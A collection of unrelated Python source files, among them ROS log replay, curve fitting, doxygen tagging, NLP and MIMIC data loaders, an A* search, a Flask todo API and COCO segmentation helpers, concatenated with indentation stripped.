parser.add_argument("logname", type=str, help="GDP log")
# cleaned up arguments
_args = rospy.myargv(argv=sys.argv)[1:]
return parser.parse_args(args=_args)
def gdp_source():
rospy.init_node("gdp_source")
gdp.gdp_init()
lock = Lock()
args = _parse_args()
topic_dict = {}
gcl_name = gdp.GDP_NAME(args.logname)
loghandle = gdp.GDP_GCL(gcl_name, gdp.GDP_MODE_RO)
loghandle.subscribe(0, 0, None)
try:
buf = ""
while not rospy.is_shutdown():
event = loghandle.get_next_event(None)
data = event["datum"]["data"]
d = pickle.loads(data)
if args.preserve:
topic = d["topic"]
else:
topic = "/gdp" + rospy.names.resolve_name(d["topic"])
topic_type = d["topic_type"]
try:
assert len(buf) == d["offset"]
except AssertionError:
## This is when we start at the wrong time, and some
## chunks of a message already have been missed.
continue
buf = buf + d["data"]
if len(buf) == d["msg_size"]:
with lock: ## get publisher, create if doesn't exist
pub = topic_dict.get(topic, None)
if pub is None:
msg_class = roslib.message.get_message_class(topic_type)
pub = rospy.Publisher(topic, msg_class, queue_size=10)
topic_dict[topic] = pub
print "Publishing message"
pub.publish(pickle.loads(zlib.decompress(buf)))
buf = ""
except rospy.ROSInterruptException:
pass
del loghandle
if __name__=="__main__":
gdp_source()
|
import numpy as np
from crepe import normal
import matplotlib.pyplot as plt
n = normal.optimize()
# Importing data
data = np.loadtxt('data.dat',float,usecols=(0,1))
N = len(data[:,0])
# Function to be simulated
def f(x,a,b):
return a*np.exp(b*x)
# The performance function: just a simple sum of the squared differences!
def perf(p):
return np.sum((data[:,1]-f(data[:,0],p[0],p[1]))**2)
# Let's guess a and b (an interval that you think they could be inside)
p_min = np.array([5.0,2.0]) # Parameters minima
p_max = np.array([10.0,10.0]) # Parameters maxima
p_mean = (p_min + p_max)/2. # Parameters means
p_sigma = (p_max - p_min)/2. # Parameters standard deviations
# The estimation by CREPE is done in just one line:
new_p_mean,new_p_sigma = n.estimate(perf,p_mean,p_sigma)
# Printing and plotting the results
print('a = %.3f p/m %.3f' % (new_p_mean[0],new_p_sigma[0]))
print('b = %.3f p/m %.3f' % (new_p_mean[1],new_p_sigma[1]))
estim_y = np.array([f(xk,new_p_mean[0],new_p_mean[1]) for xk in data[:,0]])
plt.plot(data[:,0],data[:,1],'.',label='Noisy signal')
plt.plot(data[:,0],estim_y,'g',label='Fitted signal')
plt.legend()
#plt.show()
|
#!/usr/bin/env python
import sys, os, re, glob
try:
import io
except ImportError:
import cStringIO as io
def usage():
sys.stdout.write(
"""usage: mdoc.py set group file [files...]
Add the tag "\\ingroup group" to all the doxygen comment with a \\class
tag in it.
usage: mdoc.py check group file [files...]
Check that the tag "\\ingroup group" is in all the doxygen comment with a \\class
tag in it. If the tag is not there, a warning is displayed with the file name, the
line number and the class name. The return value is 0 when all the doxygen comments
have the tag, and 1 when at least one doxygen comment don't have it.
usage: mdoc.py massive-set [ITK-source]
Add the tag "\\ingroup module" to all the headers in ITK, where 'module' is the
module name of the header.
usage: mdoc.py massive-check [ITK-source]
Check that all the headers in ITK have their module name in their \\ingroup tag.
As for 'check', a warning is displayed if the tag is missing and 1 is returned.
\n"""
)
def setGroup(fname, group):
# sys.stderr.write("Processing "+ fname +"\n")
f = open(fname, "r", encoding="utf-8")
out = io.StringIO()
# load everything in memory
fcontent = f.read()
f.close()
# now parse all the doxygen fields
last = 0
for m in re.finditer(r"/\*\*(.*?)\*/", fcontent, re.DOTALL):
# write what is before the doxygen field to the output
out.write(fcontent[last : m.start(1)])
last = m.end(1)
dcontent = m.group(1)
# we don't care about doxygen fields not about a class
if r"\class" in dcontent and dcontent != r" \class classname ":
# do we have a line with the expected content?
if re.search(r"\ingroup .*" + group + r"(\s|$)", dcontent, re.MULTILINE):
# yes - just keep the content unchanged
out.write(dcontent)
else:
# add the expected group
if "\n" in dcontent:
# this is a multiline content. Find the indent
indent = re.search(r"( *)(\*|$)", dcontent).group(1)
lastLine = dcontent.splitlines()[-1]
if re.match(r"^ *$", lastLine):
out.write(dcontent + "* \\ingroup " + group + "\n" + indent)
else:
out.write(
dcontent.rstrip()
+ "\n"
+ indent
+ "* \\ingroup "
+ group
+ "\n"
+ indent
)
else:
out.write(dcontent + " \\ingroup " + group + " ")
else:
out.write(dcontent)
out.write(fcontent[last:])
# we can save the content to the original file
f = open(fname, "w", encoding="utf-8")
f.write(out.getvalue())
f.close()
def checkGroup(fname, group):
# sys.stderr.write("Checking"+ fname + "\n")
f = open(fname, "r", encoding="utf-8")
# load everything in memory
fcontent = f.read()
f.close()
# now parse all the doxygen fields
ret = 0
for m in re.finditer(r"/\*\*(.*?)\*/", fcontent, re.DOTALL):
dcontent = m.group(1)
# we don't care about doxygen fields not about a class
if r"\class" in dcontent and dcontent != r" \class classname ":
# do we have a line with the expected content?
if not re.search(
r"\\ingroup .*" + group + r"(\s|$)", dcontent, re.MULTILINE
):
# get class name and the line for debug output
cname = re.search(r"\\class +([^ ]*)", dcontent).group(1).strip()
line = len(fcontent[: m.start(1)].splitlines())
sys.stderr.write(
r'%s:%s: error: "\ingroup %s" not set in class %s.'
% (fname, line, group, cname)
+ "\n"
)
ret = 1
return ret
def main():
# first arg is the command
command = sys.argv[1]
if command == "set":
if len(sys.argv) < 4:
usage()
return 1
# second arg is the module name, and the rest are the files to process
module = sys.argv[2]
files = sys.argv[3:]
for fname in files:
setGroup(fname, module)
return 0
elif command == "massive-set":
if len(sys.argv) < 2:
usage()
return 1
if len(sys.argv) >= 3:
d = sys.argv[2]
else:
d = sys.path[0] + "/../.."
cmm = os.path.abspath(d + "/*/*/*/itk-module.cmake")
for fname in glob.glob(cmm):
f = file(fname, "r", encoding="utf-8")
mcontent = f.read()
f.close()
module = re.search(r"itk_module\(([^ )]+)", mcontent).group(1)
dname = os.path.dirname(fname)
for fname2 in glob.glob(dname + "/include/*.h"):
setGroup(fname2, module)
return 0
elif command == "check":
if len(sys.argv) < 4:
usage()
return 1
# second arg is the module name, and the rest are the files to process
module = sys.argv[2]
files = sys.argv[3:]
ret = 0
count = 0
for fname in files:
if os.path.isdir(fname):
for fname2 in glob.glob(fname + "/*.h"):
count += 1
ret = max(ret, checkGroup(fname2, module))
else:
count += 1
ret = max(ret, checkGroup(fname, module))
sys.stderr.write(str(count) + " headers checked." + "\n")
return ret
elif command == "massive-check":
if len(sys.argv) < 2:
usage()
return 1
if len(sys.argv) >= 3:
d = sys.argv[2]
else:
d = sys.path[0] + "/../.."
cmm = os.path.abspath(d + "/*/*/*/itk-module.cmake")
ret = 0
count = 0
for fname in glob.glob(cmm):
f = file(fname, "r", encoding="utf-8")
mcontent = f.read()
f.close()
module = re.search(r"itk_module\(([^ )]+)", mcontent).group(1)
dname = os.path.dirname(fname)
for fname2 in glob.glob(dname + "/include/*.h"):
count += 1
ret = max(ret, checkGroup(fname2, module))
sys.stderr.write(str(count) + " headers checked." + "\n")
return ret
else:
sys.stderr.write("Unknown command" + command + "\n")
usage()
return 1
if __name__ == "__main__":
ret = main()
sys.exit(ret)
|
def multipes():
toplam = 0
for i in range(1000):
if i%3==0 or i%5==0:
toplam=i+toplam
print toplam
multipes()
|
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import traceback
import logging
import os
from common import constants
from common import config
from common import secret_keys as sk
from backend.eclipse2017_photo_app import Eclipse2017PhotoApp
from werkzeug.urls import url_encode
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = constants.SERVICE_ACCOUNT_PATH
logging.basicConfig(level=logging.INFO, format=constants.LOG_FMT_S_THREADED)
app = Eclipse2017PhotoApp(config.PROJECT_ID, sk.FLASK_SESSION_ENC_KEY,
sk.GOOGLE_OAUTH2_CLIENT_ID,
sk.GOOGLE_OAUTH2_CLIENT_SECRET,
debug=False)
# This is a disgusting hacky work-around for the fact that flask looks at the
# url scheme of individual requests before looking at the PREFERRED_URL_SCHEME
# config value. All our requests have an http url scheme as they come as http
# requests from nginx to gunicorn/flask. See more info here:
# http://stackoverflow.com/questions/34802316/make-flasks-url-for-use-the-https-scheme-in-an-aws-load-balancer-without-mess
def _force_https():
from flask import _request_ctx_stack
if _request_ctx_stack is not None:
reqctx = _request_ctx_stack.top
reqctx.url_adapter.url_scheme = 'https'
app.before_request(_force_https)
@app.errorhandler(Exception)
def all_exception_handler(error):
traceback.print_exc()
logging.error("internal server error: %s" % str(error))
return 'Internal server error', 500
|
from paddlenlp.data import Stack, Pad, Tuple, np
from paddlenlp.datasets import load_dataset
from paddlenlp.transformers import ErnieGramTokenizer, ErnieTokenizer
from lib.base_data_module import BaseDataModule
class ReadingComprehensionDataModule(BaseDataModule):
def __init__(self, batch_size=32, max_seq_length=512):
super().__init__(ErnieTokenizer.from_pretrained('ernie-1.0'), batch_size, max_seq_length)
def load_dataset(self):
return load_dataset("dureader_robust", splits=["train", "dev", "test"])
def convert_example(self, examples, is_predict=False):
"""转换:文本 -> Token Id"""
"""
{
'id': '7de192d6adf7d60ba73ba25cf590cc1e',
'title': '',
'context': '选择燃气热水器时,一定要关注这几个问题:1、出水稳定性要好,不能出现忽热忽冷的现象2、快速到达设定的需求水温3、操作要智能、方便4、安全性要好,要装有安全报警装置 市场上燃气热水器品牌众多,购买时还需多加对比和仔细鉴别。方太今年主打的磁化恒温热水器在使用体验方面做了全面升级:9秒速热,可快速进入洗浴模式;水温持久稳定,不会出现忽热忽冷的现象,并通过水量伺服技术将出水温度精确控制在±0.5℃,可满足家里宝贝敏感肌肤洗护需求;配备CO和CH4双气体报警装置更安全(市场上一般多为CO单气体报警)。另外,这款热水器还有智能WIFI互联功能,只需下载个手机APP即可用手机远程操作热水器,实现精准调节水温,满足家人多样化的洗浴需求。当然方太的磁化恒温系列主要的是增加磁化功能,可以有效吸附水中的铁锈、铁屑等微小杂质,防止细菌滋生,使沐浴水质更洁净,长期使用磁化水沐浴更利于身体健康。',
'question': '燃气热水器哪个牌子好',
'answers': ['方太'],
'answer_starts': [110]
}
"""
doc_stride = 128
contexts = [examples[i]['context'] for i in range(len(examples))]
questions = [examples[i]['question'] for i in range(len(examples))]
tokenized_examples = self.tokenizer(
questions,
contexts,
stride=doc_stride,
max_seq_len=self.max_seq_length)
# Let's label those examples!
for i, tokenized_example in enumerate(tokenized_examples):
# We will label impossible answers with the index of the CLS token.
input_ids = tokenized_example["input_ids"]
cls_index = input_ids.index(self.tokenizer.cls_token_id)
# The offset mappings will give us a map from token to character position in the original context. This will
# help us compute the start_positions and end_positions.
offsets = tokenized_example['offset_mapping']
# Grab the sequence corresponding to that example (to know what is the context and what is the question).
sequence_ids = tokenized_example['token_type_ids']
# One example can give several spans, this is the index of the example containing this span of text.
sample_index = tokenized_example['overflow_to_sample']
answers = examples[sample_index]['answers']
answer_starts = examples[sample_index]['answer_starts']
# Start/end character index of the answer in the text.
start_char = answer_starts[0]
end_char = start_char + len(answers[0])
# Start token index of the current span in the text.
token_start_index = 0
while sequence_ids[token_start_index] != 1:
token_start_index += 1
# End token index of the current span in the text.
token_end_index = len(input_ids) - 1
while sequence_ids[token_end_index] != 1:
token_end_index -= 1
# Minus one more to reach actual text
token_end_index -= 1
# Detect if the answer is out of the span (in which case this feature is labeled with the CLS index).
if not (offsets[token_start_index][0] <= start_char and
offsets[token_end_index][1] >= end_char):
tokenized_examples[i]["start_positions"] = cls_index
tokenized_examples[i]["end_positions"] = cls_index
else:
# Otherwise move the token_start_index and token_end_index to the two ends of the answer.
# Note: we could go after the last offset if the answer is the last word (edge case).
while token_start_index < len(offsets) and offsets[token_start_index][0] <= start_char:
token_start_index += 1
tokenized_examples[i]["start_positions"] = token_start_index - 1
while offsets[token_end_index][1] >= end_char:
token_end_index -= 1
tokenized_examples[i]["end_positions"] = token_end_index + 1
return tokenized_examples
# contexts = [examples[i]['context'] for i in range(len(examples))]
# questions = [examples[i]['question'] for i in range(len(examples))]
#
# query, title = examples["query"], examples["title"]
#
# encoded_inputs = self.tokenizer(
# text=query, text_pair=title, max_seq_len=self.max_seq_length)
#
# input_ids = encoded_inputs["input_ids"]
# token_type_ids = encoded_inputs["token_type_ids"]
#
# if is_predict:
# return input_ids, token_type_ids
# else:
# label = np.array([example["label"]], dtype="int64")
# return input_ids, token_type_ids, label
def batchify_fn(self, is_predict=False):
"""对齐"""
fn_list = [
Pad(axis=0, pad_val=self.tokenizer.pad_token_id), # input_ids
Pad(axis=0, pad_val=self.tokenizer.pad_token_type_id) # token_type_ids
]
if not is_predict:
fn_list.append(Stack(dtype="int64")) # labels
batchify_fn = lambda samples, fn=Tuple(fn_list): [data for data in fn(samples)]
return batchify_fn
train_ds, dev_ds, test_ds = load_dataset('dureader_robust', splits=('train', 'dev', 'test'))
for idx in range(2):
print(train_ds[idx])
print()
|
import os
from collections import Counter
from random import shuffle
from typing import List
from tqdm.autonotebook import tqdm
from dataloader.data import MIMICDataset, TabularFeature, get_tables
from dataloader.utils import Event
def extract_sentences(dataset, tables: List[TabularFeature], event_class=Event, suffix='', **params):
token_counter = Counter()
with open(f'embeddings/sentences{suffix}.txt', 'w') as f:
for sample in tqdm(dataset, desc='extract sentences'):
for table in tables:
for t, step in sample['inputs'][table.table]:
sentence = set()
for label, value in step:
event = event_class(table, label, value, time=t, **params)
sentence.add(event.text)
if sentence:
f.write(' '.join(sentence) + '\n')
token_counter.update(sentence)
# seperate patients
f.write('\n')
os.makedirs('embeddings', exist_ok=True)
with open(f'embeddings/sentences{suffix}.txt.counts', 'w') as f:
for token, count in token_counter.most_common():
f.write(f'{token} {count}\n')
return token_counter
if __name__ == '__main__':
DEVICE = 'cpu'
dem, chart, lab, output = get_tables(['CHARTEVENTS', 'LABEVENTS', 'OUTPUTEVENTS', 'dem'],
load=False,
n_bins=12)
from dataloader.labels import get_labels
labels = get_labels(DEVICE)
tables = [chart, lab, output, dem]
# Use train and validation set to generate sentences for fasttext
train_set = MIMICDataset(datalist_file='train_listfile.csv',
base_path='mimic3-benchmarks/data/multitask',
datasplit='train', mode='EVAL',
tables=tables, labels=labels)
# generate cache
for table in tables:
table.fit(train_set)
table.save()
tables = [chart, lab, output]
extract_sentences(train_set,
tables,
suffix='.mimic3',
event_class=Event)
|
from django.apps import AppConfig
class TweetGeneratorConfig(AppConfig):
name = 'Tweet_Generator'
|
#!/usr/bin/env python
##### !/usr/local/bin/python
##### !/usr/bin/python # for DPH mac
import numpy as np
import math
import os
import matplotlib.pyplot as plt
import sys
import glob
from math import log10, floor
from decimal import *
import matplotlib.cm as cm
import random
from scipy.interpolate import interp1d
from hnread import *
from center_angle import *
def checkinput(argv):
programname = sys.argv[0]
if len(argv) != 4: # Exit if not exactly one arguments
print '---------------------------------------------------------------------------'
print "This program calculates the resonances between two distances for resonaces smaller than 20, it takes into three arguments:\n Argument 1: Distance of the ring in planet radii\n Argument 2/3: starting/ending position"
print ' '
print ' Example: '+programname+' 2.001 2.23 2.25'
print '---------------------------------------------------------------------------'
sys.exit(1)
if float(argv[1])<0 or float(argv[2])<0 or float(argv[3])<0: # Exit if folder does not exist
print 'ERROR: Distances must be positive '
sys.exit(1)
checkinput(sys.argv)
def calcR(f,b,dis):
return (float(b)/float(f))**(2./3.)*dis
Rdis=float(sys.argv[1])
Dis_i=min([float(i) for i in [sys.argv[2],sys.argv[3]]])
Dis_f=max([float(i) for i in [sys.argv[2],sys.argv[3]]])
Ref = [float(j) for j in [i+1 for i in range(20)]]
Reb = [float(j) for j in [i+1 for i in range(20)]]
Dis=[]
DisS=[]
Resonance=[]
OrderR=[]
#print Dis_i
#print Dis_f
for f in Ref:
for b in Reb:
if f==b:
continue
else:
DisU=calcR(f,b,Rdis)
if DisU>Dis_i and DisU<Dis_f:
Resonance.append(str(int(b))+":"+str(int(f)))
OrderR.append(abs(int(b)-int(f)))
Dis.append(DisU)
DisS.append(DisU-0.02)
# Resonance.append(str(int(b))+":"+str(int(f)))
# Dis.append(DisU)
# DisS.append(DisU-0.02)
if len(Dis)==0:
print "No resonances found!"
else:
Dis,DisS,Resonance,OrderR=zip(*sorted(zip(Dis,DisS,Resonance,OrderR)))
print "--distance ------- Resonance ------- Order ----"
for i in range(len(Dis)):
print str(Dis[i])+" "+Resonance[i]+" "+str(OrderR[i])
#if len(Ref)==1 and len(Reb)==1:
# print str(Ref)+":"+str(Reb)+" "+str(calcR(Ref,Reb,Rdis))
|
import ast_node
class TagReference(ast_node.AstNode):
def __init__(self, ref_name):
self.ref_name = ref_name
def get_value(self):
return '%placeholder_value%'
def execute(self, tag_context):
return tag_context.get_tag_value(self.ref_name)
def set_value(self, tag_context, value):
tag_context.set_tag_value(self.ref_name, value)
|
# 进程池
from multiprocessing.pool import Pool
import multiprocessing
import time
import os
import random
'''
def run(name):
print('{}子进程开始运行, 进程id是{}'.format(name, os.getpid()))
start_time = time.time()
time.sleep(random.choice([1,2,3,4]))
stop_time = time.time()
print('{}子进程结束, 进程id是{},运行时间:{}'.format(name, os.getpid(), stop_time - start_time))
cpu_num = multiprocessing.cpu_count()
print(cpu_num)
p = Pool(cpu_num)
for i in range(10):
p.apply_async(run, args = (i,))
# close关闭进程池,关闭之后不能在添加进程
p.close() # 温柔结束进程,会等待进程池中的任务结束
# 对于进程池,在join之前一定要先close
p.join() # 进程池对象调用join,,会等待进程池中所有的进程结束
p.terminate() # 强制结束进程
'''
# 获取进程返回值
def f(n):
print(n)
return n**2
l = []
with Pool(processes = 4) as pool:
res = pool.apply_async(f, args = (2,))
l.append(res)
print(res.get()) # 只能在启动进程后在其后阻塞等待?
res = pool.apply_async(time.sleep, args = (3,))
# print(res.get())
l.append(res)
|
import numpy as np
import math as m
import os.path
import subprocess
import cosmolopy as cosmos
import multiprocessing as mp
# --- Local ---
from Spectrum import data as spec_data
from Spectrum import fft as spec_fft
from Spectrum import spec as spec_spec
from Spectrum import fortran as spec_fort
def bisp_wrapper(i_mock):
''' Bispectrum calculation wrapper
'''
# catalog dictionary
catdict = {'catalog': {'name': 'patchy', 'n_mock': i_mock}}
spec = spec_spec.Spec('bispec', catdict)
spec.calculate()
return None
def build_bisp_patchy(Nthreads):
''' Calculate bispectrum for PATCHY mocks parallel for Nthreads
'''
pool = mp.Pool(processes=Nthreads)
mapfn = pool.map
arglist = range(1, 1001)
mapfn(bisp_wrapper, [arg for arg in arglist])
pool.close()
pool.terminate()
pool.join()
return
if __name__=='__main__':
build_bisp_patchy(10)
|
#!/usr/bin/python
bytelist = [x.strip() for x in open('bytes.txt','r').readlines()]
lin = open('linear_eqs.py','w')
lin.write("#!/usr/bin/python\nfrom z3 import *\n")
for i in range(26):
lin.write("var_"+str(i)+" = Int('var_"+str(i)+"')\n")
lin.write("solve(")
def replacelabel(bytenum):
firstbyte = 0x805F454
thisbyte = int(bytenum.split("_")[1],16)
intnum = thisbyte - firstbyte
return("var_" + str(intnum))
block = []
for line in bytelist:
if "=" in line:
block.append(replacelabel(line.split()[0]))
lin.write(' + '.join(block)+" == "+line.split()[2]+",")
block = []
elif "byte_" in line:
block.append(replacelabel(line))
lin.write(")")
lin.close()
|
import base64
account_username = 'email.address@gmail.com'
account_pass = base64.b64decode('dfshfksdjkhfgdsjkhgsdjk')
special_message_sender = 'secret.squirrel@gmail.com'
magic_subject_words = ['file', 'available']
wait_time_in_seconds = 10
file_source = 'localhost:/tmp/test_sourcedir'
file_dest = '/tmp/test_destdir'
|
# Author Sven Koppany
# This implements the a-star search algorithm
import numpy as np
import scipy.io
import random
from matplotlib import pyplot as plt
from matplotlib import animation
class astar:
def __init__(self, worldMap, matlabMap = False, startAndGoalCoords = ((0,0),(4,4)), randomCoords = False):
#Convert the matlab map to a numpy array
if matlabMap == True:
self.worldMap = np.asanyarray(scipy.io.loadmat(worldMap)['grid'])
#change the walls to -1 so that the first path is recordable
self.worldMap[self.worldMap == 1] = 255 #for better imaging
#But if it is an numpy ndarray
elif type(worldMap) is np.ndarray:
self.worldMap = worldMap
#Generate random start and target coordinates in the map
if randomCoords == True:
self.startAndGoalCoords = self.getRandomLocations()
else:
self.startAndGoalCoords = startAndGoalCoords
self.path = self.getAStarPath()
def getRandomLocations(self):
#
def findEmptyLoc():
while True:
loc = (random.randint(0,self.worldMap.shape[0]-1),
random.randint(0,self.worldMap.shape[1]-1))
if self.worldMap[loc] == 0:
break
return loc
while True:
startLoc = findEmptyLoc()
goalLoc = findEmptyLoc()
if startLoc != goalLoc:
break
return (startLoc, goalLoc)
def getAStarPath(self):
world = self.worldMap #world map
start = self.startAndGoalCoords[0] #starting location
goal = self.startAndGoalCoords[1] #goal location
closed = [] #closed cells
frontier = {} #open cells with g-values
frontier_f = {} # dict of f-values
cameFrom = {}
moveCost = 1
def heuristicManh(cell): #the heuristic using Manhattan movement
return abs(cell[0] - goal[0]) + abs(cell[1] - goal[1]) * moveCost
def fValue(cell):
return frontier[cell] + heuristicManh(cell)
def expandManh(cell): #expand with Manhattan movement
limitY, limitX = world.shape #get the map limits
cY, cX = cell #get the node coords
options = []
if cY - 1 >= 0 and world[(cY - 1, cX)] == 0:
options.append((cY - 1, cX))
if cY + 1 < limitY and world[(cY + 1, cX)] == 0:
options.append((cY + 1, cX))
if cX - 1 >= 0 and world[(cY, cX - 1)] == 0:
options.append((cY, cX - 1))
if cX + 1 < limitX and world[(cY, cX + 1)] == 0:
options.append((cY, cX + 1))
return options
def buildPath(cell):
current = cell
path = [cell]
#Find the path from current(goal) back to start
while current != start:
current = cameFrom[current]
path.append(current)
return path
#Put the starting cell into frontier,
# g-value = 0, f-value = h + g
frontier[start] = 0
frontier_f[fValue(start)] = [start] #cal f-value and store it
while bool(frontier): #while frontier is not empty
#set current to the minimum f-value
current = min(frontier_f.items(), key=lambda x: x[0])
#save the lowest f-value and the current cell coords
lowF = current[0]
cell = current[1][0]
#if the goal has been reached, find the shortest path
if cell == goal:
return buildPath(cell)
#iterate through the neighbors
neighbors = expandManh(cell)
for i, v in enumerate(neighbors):
#skip closed cells
if v in closed:
continue
#next g-value
gScore = frontier[cell] + moveCost
#if the neighbor is not in the open frontier
if v not in frontier.keys():
#record its parent
cameFrom[v] = cell
#record the g-val and f-val
frontier[v] = gScore
fScore = fValue(v)
if fScore not in frontier_f.keys():
frontier_f[fScore] = [v]
else:
frontier_f[fScore].append(v)
#move current cell to closed
closed.append(cell)
del frontier[cell]
frontier_f[lowF].remove(cell)
if frontier_f[lowF] == []:
del frontier_f[lowF]
return False
if __name__ == '__main__':
#import map from MatLab
# sometimes this times out
#astarPath = astar(worldMap = 'staticMap_254.mat', matlabMap = True, startAndGoalCoords = ((20, 20),(500, 500)))
#simple example
world = np.array([[0,0,0,0,1,0],
[0,0,0,0,1,0],
[0,0,0,0,1,0],
[0,1,1,1,1,0],
[0,0,0,1,0,0],
[0,0,0,0,0,0]])
astarPath = astar(worldMap = world, matlabMap = False, startAndGoalCoords = ((3,5),(1,2)))
print astarPath.path
|
import json
import os
import time
from flask import Flask, Response, request
app = Flask(__name__, static_url_path='', static_folder='public')
app.add_url_rule('/', 'root', lambda: app.send_static_file('index.html'))
@app.route('/api/todo/list', methods=['GET', 'POST'])
def og_handler():
# Open the json file for reading
with open('todo.json', 'r') as f:
todo = json.loads(f.read())
if request.method == 'POST':
# Grab the new incoming todo
new_todo = request.form.to_dict()
# Add an ID to the todo to make it unique
new_todo['id'] = int(time.time() * 1000)
# Append new todo object to the stored one
todo.append(new_todo)
# Write the updates to the json file
with open('todo.json', 'w') as f:
# Pretty print into the JSON file
f.write(json.dumps(todo, indent=4, separators=(',', ': ')))
return Response(
# Send the JSON object back to be consumed by the view
json.dumps(todo),
status=200,
mimetype='application/json',
headers={
'Cache-Control': 'no-cache',
'Access-Control-Allow-Origin': '*'
}
)
@app.route('/api/todo/list', methods=['PUT'])
def sort_todo_handler():
data = request.get_json()
# Open the json file for reading
with open('todo.json', 'r') as f:
todo = json.loads(f.read())
todo.pop(data['from'])
todo.insert(data['to'], data['data'])
# Write the updates to the json file
with open('todo.json', 'w') as f:
# Pretty print into the JSON file
f.write(json.dumps(todo, indent=4, separators=(',', ': ')))
return Response(
# Send the JSON object back to be consumed by the view
# json.dumps(todo),
status = 200,
mimetype='application/json',
headers={
'Cache-Control': 'no-cache',
'Access-Control-Allow-Origin': '*'
}
)
@app.route('/api/todo/list/checkbox', methods=['PUT'])
def checkbox_handler():
data = request.get_json()
# print json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))
# Open the json file for reading
with open('todo.json', 'r') as f:
todo = json.loads(f.read())
#If we are not targeting a specific checkbox make them all checked
if data['index'] == "":
for index, item in enumerate(todo):
todo[index]['checked'] = data['state']
else:
#Set the current state of the checkbox
todo[data['index']]['checked'] = data['state']
# print json.dumps(todo, sort_keys=True, indent=4, separators=(',', ': '))
# Write the updates to the json file
with open('todo.json', 'w') as f:
# Pretty print into the JSON file
f.write(json.dumps(todo, indent=4, separators=(',', ': ')))
return Response(
# Send the JSON object back to be consumed by the view
json.dumps(todo),
status = 200,
mimetype='application/json',
headers={
'Cache-Control': 'no-cache',
'Access-Control-Allow-Origin': '*'
}
)
if __name__ == '__main__':
app.run(port=int(os.environ.get("PORT", 3000)), debug=True)
|
import numpy as np
import os
import skimage.io as io
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
from matplotlib.collections import PatchCollection
from shapely.geometry import Polygon as Pgon
def show_gt_mask(bbox_img, polygons, colors):
"""Show ground truth object segmentation mask
Args:
bbox_img (array): cropped version of original image to bounding box of object segmentation mask
polygons (array): array of matplotlib Polygon objects
colors (array): array of floats representing colors
Returns:
None
Output:
Shaded and outlined object segmentation mask in the bounding box image provided
"""
assert len(polygons) == len(colors)
plt.imshow(bbox_img)
ax = plt.gca()
ax.set_autoscale_on(False)
p = PatchCollection(polygons, facecolor=colors, linewidths=0, alpha=0.4)
ax.add_collection(p)
p = PatchCollection(polygons, facecolor='none', edgecolors=colors, linewidths=2)
ax.add_collection(p)
def pairwise_group(alt_seg):
"""Converts a flattened array to an array of tuples
Args:
alt_seg (array-like): array of sequential object segmentation points
Returns:
pgon_pts (array of tuples): array of sequential points of a polygon
"""
pgon_pts = []
assert len(alt_seg) % 2 == 0
for i in range(len(alt_seg) // 2):
pgon_pts.append((alt_seg[2 * i], alt_seg[2 * i + 1]))
return pgon_pts
def getBboxImgXY(img, ann, margin=0.2):
"""Calculates the bounding box subimage of the object in the annotation
Args:
img (np.array): original image
ann (dict): an annotation provided by the Coco dataset
margin (float)
Returns:
bboxImg (np.array): bounding box subimage on object
x0 (int): minimal x-coordinate of the bounding box
y0 (int): minimal y-coordinate of the bounding box
"""
assert 0 <= margin < 1.0, "Margin is out of band!"
def validate(x0, x1, y0, y1):
y0 = int(max(y0, 0))
y1 = int(min(y1, img.shape[0]))
x0 = int(max(x0, 0))
x1 = int(min(x1, img.shape[1]))
return x0, x1, y0, y1
x0, y0, width, height = ann['bbox']
maxmargin = max(width, height) * (1 + margin)
x_mid = (x0 + width/2)
y_mid = (y0 + height/2)
x1, y1 = x_mid + maxmargin/2, y_mid + maxmargin/2
x0, y0 = x_mid - maxmargin/2, y_mid - maxmargin/2
x0, x1, y0, y1 = validate(x0, x1, y0, y1)
bboxImg = np.copy(img[y0:y1, x0:x1])
return bboxImg, x0, y0
def getPgonsBboxImgsColorsAltSegs(img, anns, polygons):
"""Retrieve polygons, bounding box images, colors, and segmentation coordinates of objects
Args:
img (np.array): image to process
anns (array): array of annotations for objects
polygons (array): array of matplotlib Polygons (for original image)
Returns:
pgons (array): array of matplotlib Polygon objects (for bbox image)
bboxImgs (array): array of bounding box subimages of each object in the image
colors (array): colors to use to display visuals
alt_segs (array): array containing new object seg coordinates relative to bboxImg
"""
assert len(anns) == len(polygons)
pgons, bboxImgs, colors, alt_segs = [], [], [], []
for i in range(len(anns)):
ann = anns[i]
bboxImg, x0, y0 = getBboxImgXY(img, ann)
bboxImgs.append(bboxImg)
c = (np.random.random((1, 3))*0.6+0.4).tolist()[0]
if 'segmentation' in ann:
if type(ann['segmentation']) == list:
alt_seg = np.copy(ann['segmentation'])
for seg in alt_seg:
for i in range(len(seg)):
if i % 2 == 0:
seg[i] = int(seg[i] - x0)
else:
seg[i] = int(seg[i] - y0)
alt_segs.append(alt_seg)
_pgons = []
_colors = []
for seg in alt_seg:
poly = np.array(seg).reshape((int(len(seg)/2), 2))
_pgons.append(Polygon(poly))
_colors.append(c)
pgons.append(_pgons)
colors.append(_colors)
return pgons, bboxImgs, colors, alt_segs
def getPolygonsLabelsMasksColorsBboxImgs(coco, img, anns):
"""Retrieve coordinates, labels, gt mask, and bounding box of objects in an image
Args:
coco (COCO object): coco object of portion of the dataset used
img (np.array): image to process
anns (array): array of annotation provided for the image by the dataset
Returns:
pgons (array): array of matplotlib Polygon objects
object_labels (array): labels (int) for each object
alt_segs (array): array containing new object seg coordinates relative to bboxImg
colors (array): colors to use to display visuals
bboxImgs (array): array of bounding box subimages of each object in the image
"""
polygons, object_labels = [], []
_to_remove = [] # Contains annotations without object segmentations
for ann in anns:
c = (np.random.random((1, 3))*0.6+0.4).tolist()[0]
if 'segmentation' in ann:
if type(ann['segmentation']) == list:
# Get label info
cat_info = coco.loadCats(ann['category_id'])[0]
object_labels.append((cat_info['id'], cat_info['name']))
# Create matplotlib Polygon
polys = []
for seg in ann['segmentation']:
poly = np.array(seg).reshape((int(len(seg)/2), 2))
polys.append(Polygon(poly))
polygons.append(polys)
else:
_to_remove.append(ann)
else:
_to_remove.append(ann)
for a in _to_remove:
anns.remove(a)
